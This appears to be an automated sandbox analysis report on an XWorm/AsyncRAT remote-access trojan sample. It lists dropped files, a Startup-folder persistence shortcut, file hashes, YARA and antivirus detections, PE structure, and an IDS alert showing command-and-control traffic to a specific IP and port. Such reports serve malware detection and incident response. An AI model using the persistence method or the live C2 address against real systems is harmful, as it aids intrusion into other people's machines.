                                                                        Malicious:false
                                                                        Preview:....### explorer ###..[WIN]r

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2btqs4td.xor.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qvicenh.xcw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sa1qjwq.dsj.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzlipzjw.qko.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5xiwdh4.odj.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbagwgfe.msp.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0zjlqki.ant.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxotlmsz.3hp.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1kvt1ad.24m.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5atkaji.00u.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4rhh4ym.3vm.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbn5n434.gpd.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tr3v5kob.imb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5bwrxah.s53.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzduiu2v.2ks.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xw3o30vy.2dz.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ANuh30XoVu.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 1 19:57:53 2025, mtime=Wed Jan 1 19:57:53 2025, atime=Wed Jan 1 19:57:53 2025, length=67584, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):735
                                                                        Entropy (8bit):5.052323117484549
                                                                        Encrypted:false
                                                                        SSDEEP:12:8tWlEs4/WCKpygdY//G2zQtuLDSlMrjA6Nll5rH2sCbBmV:8Ul4u9+epWKMfA6TivbBm
                                                                        MD5:417AF09A6651E97637B228A041C93876
                                                                        SHA1:E16DF341E64737F5EFF4E8DFFE5651E8E00FCEFD
                                                                        SHA-256:C56A8513849A510DEAC704B42DA4D04EC24A023E6499B54C98715CD1BC75D528
                                                                        SHA-512:5C7ADF0238251DC5FD772680A28DE033A372DCE6C692BEFE019AD4E5530B142F2295B28C8CF111F23FA01626C9C81F912CC94CA875403C47833FEC5E9B122F20
                                                                        Malicious:false
                                                                        Preview:L..................F.... ...].L.\..].L.\..].L.\..........................h.:..DG..Yr?.D..U..k0.&...&......vk.v....{g...\..7._.\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z.............................%..A.p.p.D.a.t.a...B.V.1.....!Z....Roaming.@......CW.^!Z............................8$_.R.o.a.m.i.n.g.....T.2.....!Z;. .SYSTEM..>......!Z;.!Z;...........,.................o.S.Y.S.T.E.M.......T...............-.......S...........@........C:\Users\user\AppData\Roaming\SYSTEM........\.....\.....\.....\.....\.S.Y.S.T.E.M.`.......X.......745773...........hT..CrF.f4... .Y.$......,.......hT..CrF.f4... .Y.$......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                        C:\Users\user\AppData\Roaming\SYSTEM

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ANuh30XoVu.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):67584
                                                                        Entropy (8bit):5.883586653029049
                                                                        Encrypted:false
                                                                        SSDEEP:1536:d7wLowj4Osyyt4pbODVvyv6PAjOBQ6tEzHD:d7ej4x4pbOxyljOBbt4HD
                                                                        MD5:C0D9A8B29B80A47CBD0963F5DC1A8266
                                                                        SHA1:4D7EF477523C72E0C03D235038669B974B7F6D31
                                                                        SHA-256:A8BD024F05A7430ED667070EA680D7B4F80DC0D6A2CF6149874A1D784AA5B47E
                                                                        SHA-512:04E7176442203A589D5C8870AD86CA184DD7B41F81FBD75461F424B2361420C0B5D84932E25566EE16478179985D3B74D5B9EBAD22A7CC35628F8D5DD50AE29C
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Sekoia.io
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 76%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,vug................................. ... ....@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........b.........&.....................................................(....*.r...p*. ...*..(....*.rg..p*. .Q..*.s.........s.........s.........s.........*.r...p*.r3..p*. .O..*.r...p*. [.x.*.r...p*. ....*.rG..p*. ~.H.*..((...*.r...p*. *p{.*.r...p*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(V...*"(....+.*&(....&+.*.+5sg... .... .'..oh...(,...~....-.(_...(Q...~....oi...&.-.*.r...p*.r...p*. ....*.rY..p*. 6.[.*.r...p*. ....*.r...p*.r1..p*. ....*.ry..p*. '...*.r...p*.r...p*. S.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.883586653029049
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:ANuh30XoVu.exe
                                                                        File size:67'584 bytes
                                                                        MD5:c0d9a8b29b80a47cbd0963f5dc1a8266
                                                                        SHA1:4d7ef477523c72e0c03d235038669b974b7f6d31
                                                                        SHA256:a8bd024f05a7430ed667070ea680d7b4f80dc0d6a2cf6149874a1d784aa5b47e
                                                                        SHA512:04e7176442203a589d5c8870ad86ca184dd7b41f81fbd75461f424b2361420c0b5d84932e25566ee16478179985d3b74d5b9ebad22a7cc35628f8d5dd50ae29c
                                                                        SSDEEP:1536:d7wLowj4Osyyt4pbODVvyv6PAjOBQ6tEzHD:d7ej4x4pbOxyljOBbt4HD
                                                                        TLSH:76636D5C7BF10125E5FF9FB15CE5B216C639BB635903E11F24C5028A1A27A88CE817F6
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,vug................................. ... ....@.. .......................`............@................................

                                                                        File Icon

                                                                        Icon Hash:90cececece8e8eb0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x411dae
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6775762C [Wed Jan 1 17:06:52 2025 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x11d600x4b.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x4ce.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xfdb40xfe00ddaa410ff250dd764b6c754d1c4c2c1bFalse0.589474655511811data5.96398170543067IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x120000x4ce0x600c10bcfdd4f6060d177e43857016a216bFalse0.373046875data3.71608069660327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x140000xc0x2004f2a0619abec81b0d0c7e8a9a3515e31False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0x120a00x244data0.4706896551724138
                                                                        RT_MANIFEST0x122e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-01-01T21:58:10.950298+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449739147.185.221.2456526TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 1, 2025 21:57:00.132105112 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:57:00.136913061 CET8049730208.95.112.1192.168.2.4
                                                                        Jan 1, 2025 21:57:00.136977911 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:57:00.137609005 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:57:00.142426014 CET8049730208.95.112.1192.168.2.4
                                                                        Jan 1, 2025 21:57:00.592973948 CET8049730208.95.112.1192.168.2.4
                                                                        Jan 1, 2025 21:57:00.646822929 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:57:57.373250008 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:57:57.378093004 CET5652649739147.185.221.24192.168.2.4
